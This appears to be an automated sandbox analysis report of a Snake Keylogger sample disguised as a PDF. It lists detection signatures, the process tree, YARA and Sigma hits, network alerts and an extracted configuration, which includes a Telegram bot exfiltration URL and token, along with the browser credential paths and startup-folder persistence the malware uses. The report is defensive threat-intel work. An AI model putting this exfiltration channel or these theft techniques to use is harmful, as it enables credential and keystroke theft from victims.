Edit tour

Windows Analysis Report
IMG-20241119-WA0006(162KB).Pdf.exe

Overview

General Information

Sample name:	IMG-20241119-WA0006(162KB).Pdf.exe
Analysis ID:	1562136
MD5:	9a4fb2a5a118c7d3feafaf6d439ff40e
SHA1:	ffcff130146653cb19addcbba99f90ef07881ad9
SHA256:	b1ca4dc79c3ef98789267e703748ac340aa6f84178f7f477e7214f5bbf0bbd78
Tags:	exeSnakeKeyloggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Suspicious Double Extension File Execution

Yara detected Snake Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

IMG-20241119-WA0006(162KB).Pdf.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe" MD5: 9A4FB2A5A118C7D3FEAFAF6D439FF40E)

silvexes.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe" MD5: 9A4FB2A5A118C7D3FEAFAF6D439FF40E)

RegSvcs.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 7628 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

silvexes.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\Wausaukee\silvexes.exe" MD5: 9A4FB2A5A118C7D3FEAFAF6D439FF40E)

RegSvcs.exe (PID: 7696 cmdline: "C:\Users\user\AppData\Local\Wausaukee\silvexes.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7578088265:AAHvd5E9MBWeIBV2JVvDWdTRg0KYKBSK8MM/sendMessage?chat_id=7365454061", "Token": "7578088265:AAHvd5E9MBWeIBV2JVvDWdTRg0KYKBSK8MM", "Chat_id": "7365454061", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4120751881.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x148e4:$a1: get_encryptedPassword 0x14bd0:$a2: get_encryptedUsername 0x146f0:$a3: get_timePasswordChanged 0x147eb:$a4: get_passwordField 0x148fa:$a5: set_encryptedPassword 0x15f7c:$a7: get_logins 0x15edf:$a10: KeyLoggerEventArgs 0x15b4a:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x198b4:$x1: $%SMTPDV$ 0x18298:$x2: $#TheHashHere%& 0x1985c:$x3: %FTPDV$ 0x18238:$x4: $%TelegramDv$ 0x15b4a:$x5: KeyLoggerEventArgs 0x15edf:$x5: KeyLoggerEventArgs 0x19880:$m2: Clipboard Logs ID 0x19abe:$m2: Screenshot Logs ID 0x19bce:$m2: keystroke Logs ID 0x19ea8:$m3: SnakePW 0x19a96:$m4: \SnakeKeylogger\
00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14ae4:$a1: get_encryptedPassword 0x14dd0:$a2: get_encryptedUsername 0x148f0:$a3: get_timePasswordChanged 0x149eb:$a4: get_passwordField 0x14afa:$a5: set_encryptedPassword 0x1617c:$a7: get_logins 0x160df:$a10: KeyLoggerEventArgs 0x15d4a:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c46a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b69c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bacf:$a4: \Orbitum\User Data\Default\Login Data 0x1cb0e:$a5: \Kometa\User Data\Default\Login Data
00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x156bd:$s1: UnHook 0x156c4:$s2: SetHook 0x156cc:$s3: CallNextHook 0x156d9:$s4: _hook
00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19ab4:$x1: $%SMTPDV$ 0x18498:$x2: $#TheHashHere%& 0x19a5c:$x3: %FTPDV$ 0x18438:$x4: $%TelegramDv$ 0x15d4a:$x5: KeyLoggerEventArgs 0x160df:$x5: KeyLoggerEventArgs 0x19a80:$m2: Clipboard Logs ID 0x19cbe:$m2: Screenshot Logs ID 0x19dce:$m2: keystroke Logs ID 0x1a0a8:$m3: SnakePW 0x19c96:$m4: \SnakeKeylogger\
00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14ae4:$a1: get_encryptedPassword 0x14dd0:$a2: get_encryptedUsername 0x148f0:$a3: get_timePasswordChanged 0x149eb:$a4: get_passwordField 0x14afa:$a5: set_encryptedPassword 0x1617c:$a7: get_logins 0x160df:$a10: KeyLoggerEventArgs 0x15d4a:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c46a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b69c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bacf:$a4: \Orbitum\User Data\Default\Login Data 0x1cb0e:$a5: \Kometa\User Data\Default\Login Data
00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x156bd:$s1: UnHook 0x156c4:$s2: SetHook 0x156cc:$s3: CallNextHook 0x156d9:$s4: _hook
00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19ab4:$x1: $%SMTPDV$ 0x18498:$x2: $#TheHashHere%& 0x19a5c:$x3: %FTPDV$ 0x18438:$x4: $%TelegramDv$ 0x15d4a:$x5: KeyLoggerEventArgs 0x160df:$x5: KeyLoggerEventArgs 0x19a80:$m2: Clipboard Logs ID 0x19cbe:$m2: Screenshot Logs ID 0x19dce:$m2: keystroke Logs ID 0x1a0a8:$m3: SnakePW 0x19c96:$m4: \SnakeKeylogger\
00000005.00000002.4121149937.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4120751881.0000000002D71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.4121149937.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: silvexes.exe PID: 7444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: silvexes.exe PID: 7444	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: silvexes.exe PID: 7444	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x141b5d:$a1: get_encryptedPassword 0x141e3f:$a2: get_encryptedUsername 0x141973:$a3: get_timePasswordChanged 0x141a6e:$a4: get_passwordField 0x141b73:$a5: set_encryptedPassword 0x144055:$a7: get_logins 0x143fb8:$a10: KeyLoggerEventArgs 0x143c23:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: silvexes.exe PID: 7444	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x143c23:$x5: KeyLoggerEventArgs 0x143fb8:$x5: KeyLoggerEventArgs 0x1448bf:$x5: KeyLoggerEventArgs 0x144c20:$x5: KeyLoggerEventArgs 0x1461e4:$m2: Clipboard Logs ID 0x1462ea:$m2: Screenshot Logs ID 0x146340:$m2: keystroke Logs ID 0x146475:$m3: SnakePW 0x1462d6:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 7488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7488	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7488	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x31038:$a1: get_encryptedPassword 0x3131a:$a2: get_encryptedUsername 0x30e4e:$a3: get_timePasswordChanged 0x30f49:$a4: get_passwordField 0x3104e:$a5: set_encryptedPassword 0x33530:$a7: get_logins 0x33493:$a10: KeyLoggerEventArgs 0x330fe:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7488	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x330fe:$x5: KeyLoggerEventArgs 0x33493:$x5: KeyLoggerEventArgs 0x33d9a:$x5: KeyLoggerEventArgs 0x340fb:$x5: KeyLoggerEventArgs 0x356bf:$m2: Clipboard Logs ID 0x357c5:$m2: Screenshot Logs ID 0x3581b:$m2: keystroke Logs ID 0x35950:$m3: SnakePW 0x357b1:$m4: \SnakeKeylogger\
Process Memory Space: silvexes.exe PID: 7676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: silvexes.exe PID: 7676	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: silvexes.exe PID: 7676	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1234d6:$a1: get_encryptedPassword 0x1237b8:$a2: get_encryptedUsername 0x1232ec:$a3: get_timePasswordChanged 0x1233e7:$a4: get_passwordField 0x1234ec:$a5: set_encryptedPassword 0x1259ce:$a7: get_logins 0x125931:$a10: KeyLoggerEventArgs 0x12559c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: silvexes.exe PID: 7676	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x12559c:$x5: KeyLoggerEventArgs 0x125931:$x5: KeyLoggerEventArgs 0x126238:$x5: KeyLoggerEventArgs 0x126599:$x5: KeyLoggerEventArgs 0x127b5d:$m2: Clipboard Logs ID 0x127c63:$m2: Screenshot Logs ID 0x127cb9:$m2: keystroke Logs ID 0x127dee:$m3: SnakePW 0x127c4f:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 7696	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7696	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.silvexes.exe.19a0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.silvexes.exe.19a0000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.silvexes.exe.19a0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ce4:$a1: get_encryptedPassword 0x12fd0:$a2: get_encryptedUsername 0x12af0:$a3: get_timePasswordChanged 0x12beb:$a4: get_passwordField 0x12cfa:$a5: set_encryptedPassword 0x1437c:$a7: get_logins 0x142df:$a10: KeyLoggerEventArgs 0x13f4a:$a11: KeyLoggerEventArgsEventHandler
4.2.silvexes.exe.19a0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a66a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1989c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19ccf:$a4: \Orbitum\User Data\Default\Login Data 0x1ad0e:$a5: \Kometa\User Data\Default\Login Data
4.2.silvexes.exe.19a0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x138bd:$s1: UnHook 0x138c4:$s2: SetHook 0x138cc:$s3: CallNextHook 0x138d9:$s4: _hook
4.2.silvexes.exe.19a0000.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17cb4:$x1: $%SMTPDV$ 0x16698:$x2: $#TheHashHere%& 0x17c5c:$x3: %FTPDV$ 0x16638:$x4: $%TelegramDv$ 0x13f4a:$x5: KeyLoggerEventArgs 0x142df:$x5: KeyLoggerEventArgs 0x17c80:$m2: Clipboard Logs ID 0x17ebe:$m2: Screenshot Logs ID 0x17fce:$m2: keystroke Logs ID 0x182a8:$m3: SnakePW 0x17e96:$m4: \SnakeKeylogger\
1.2.silvexes.exe.1e60000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.silvexes.exe.1e60000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.silvexes.exe.1e60000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ce4:$a1: get_encryptedPassword 0x12fd0:$a2: get_encryptedUsername 0x12af0:$a3: get_timePasswordChanged 0x12beb:$a4: get_passwordField 0x12cfa:$a5: set_encryptedPassword 0x1437c:$a7: get_logins 0x142df:$a10: KeyLoggerEventArgs 0x13f4a:$a11: KeyLoggerEventArgsEventHandler
1.2.silvexes.exe.1e60000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a66a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1989c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19ccf:$a4: \Orbitum\User Data\Default\Login Data 0x1ad0e:$a5: \Kometa\User Data\Default\Login Data
1.2.silvexes.exe.1e60000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x138bd:$s1: UnHook 0x138c4:$s2: SetHook 0x138cc:$s3: CallNextHook 0x138d9:$s4: _hook
1.2.silvexes.exe.1e60000.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17cb4:$x1: $%SMTPDV$ 0x16698:$x2: $#TheHashHere%& 0x17c5c:$x3: %FTPDV$ 0x16638:$x4: $%TelegramDv$ 0x13f4a:$x5: KeyLoggerEventArgs 0x142df:$x5: KeyLoggerEventArgs 0x17c80:$m2: Clipboard Logs ID 0x17ebe:$m2: Screenshot Logs ID 0x17fce:$m2: keystroke Logs ID 0x182a8:$m3: SnakePW 0x17e96:$m4: \SnakeKeylogger\
4.2.silvexes.exe.19a0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.silvexes.exe.19a0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.silvexes.exe.19a0000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.silvexes.exe.19a0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14ae4:$a1: get_encryptedPassword 0x14dd0:$a2: get_encryptedUsername 0x148f0:$a3: get_timePasswordChanged 0x149eb:$a4: get_passwordField 0x14afa:$a5: set_encryptedPassword 0x1617c:$a7: get_logins 0x160df:$a10: KeyLoggerEventArgs 0x15d4a:$a11: KeyLoggerEventArgsEventHandler
4.2.silvexes.exe.19a0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c46a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b69c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bacf:$a4: \Orbitum\User Data\Default\Login Data 0x1cb0e:$a5: \Kometa\User Data\Default\Login Data
4.2.silvexes.exe.19a0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x156bd:$s1: UnHook 0x156c4:$s2: SetHook 0x156cc:$s3: CallNextHook 0x156d9:$s4: _hook
4.2.silvexes.exe.19a0000.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19ab4:$x1: $%SMTPDV$ 0x18498:$x2: $#TheHashHere%& 0x19a5c:$x3: %FTPDV$ 0x18438:$x4: $%TelegramDv$ 0x15d4a:$x5: KeyLoggerEventArgs 0x160df:$x5: KeyLoggerEventArgs 0x19a80:$m2: Clipboard Logs ID 0x19cbe:$m2: Screenshot Logs ID 0x19dce:$m2: keystroke Logs ID 0x1a0a8:$m3: SnakePW 0x19c96:$m4: \SnakeKeylogger\
1.2.silvexes.exe.1e60000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.silvexes.exe.1e60000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.silvexes.exe.1e60000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.silvexes.exe.1e60000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14ae4:$a1: get_encryptedPassword 0x14dd0:$a2: get_encryptedUsername 0x148f0:$a3: get_timePasswordChanged 0x149eb:$a4: get_passwordField 0x14afa:$a5: set_encryptedPassword 0x1617c:$a7: get_logins 0x160df:$a10: KeyLoggerEventArgs 0x15d4a:$a11: KeyLoggerEventArgsEventHandler
1.2.silvexes.exe.1e60000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c46a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b69c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bacf:$a4: \Orbitum\User Data\Default\Login Data 0x1cb0e:$a5: \Kometa\User Data\Default\Login Data
1.2.silvexes.exe.1e60000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x156bd:$s1: UnHook 0x156c4:$s2: SetHook 0x156cc:$s3: CallNextHook 0x156d9:$s4: _hook
1.2.silvexes.exe.1e60000.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19ab4:$x1: $%SMTPDV$ 0x18498:$x2: $#TheHashHere%& 0x19a5c:$x3: %FTPDV$ 0x18438:$x4: $%TelegramDv$ 0x15d4a:$x5: KeyLoggerEventArgs 0x160df:$x5: KeyLoggerEventArgs 0x19a80:$m2: Clipboard Logs ID 0x19cbe:$m2: Screenshot Logs ID 0x19dce:$m2: keystroke Logs ID 0x1a0a8:$m3: SnakePW 0x19c96:$m4: \SnakeKeylogger\
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe", CommandLine: "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe, NewProcessName: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe, OriginalFileName: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe", ProcessId: 7420, ProcessName: IMG-20241119-WA0006(162KB).Pdf.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs" , ProcessId: 7628, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs" , ProcessId: 7628, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe, ProcessId: 7444, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T08:49:07.037148+0100	2803305	3	Unknown Traffic	192.168.2.4	49732	172.67.177.134	443	TCP
2024-11-25T08:49:19.423365+0100	2803305	3	Unknown Traffic	192.168.2.4	49744	172.67.177.134	443	TCP
2024-11-25T08:49:22.683340+0100	2803305	3	Unknown Traffic	192.168.2.4	49751	172.67.177.134	443	TCP
2024-11-25T08:49:22.938836+0100	2803305	3	Unknown Traffic	192.168.2.4	49752	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T08:49:02.772788+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	193.122.6.168	80	TCP
2024-11-25T08:49:05.413558+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	193.122.6.168	80	TCP
2024-11-25T08:49:08.523004+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.6.168	80	TCP
2024-11-25T08:49:11.679157+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49735	193.122.6.168	80	TCP
2024-11-25T08:49:15.147801+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49737	193.122.6.168	80	TCP
2024-11-25T08:49:17.788660+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49737	193.122.6.168	80	TCP
2024-11-25T08:49:20.960339+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49748	193.122.6.168	80	TCP
2024-11-25T08:49:24.210363+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49754	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.4121149937.0000000002A61000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7578088265:AAHvd5E9MBWeIBV2JVvDWdTRg0KYKBSK8MM/sendMessage?chat_id=7365454061", "Token": "7578088265:AAHvd5E9MBWeIBV2JVvDWdTRg0KYKBSK8MM", "Chat_id": "7365454061", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: IMG-20241119-WA0006(162KB).Pdf.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

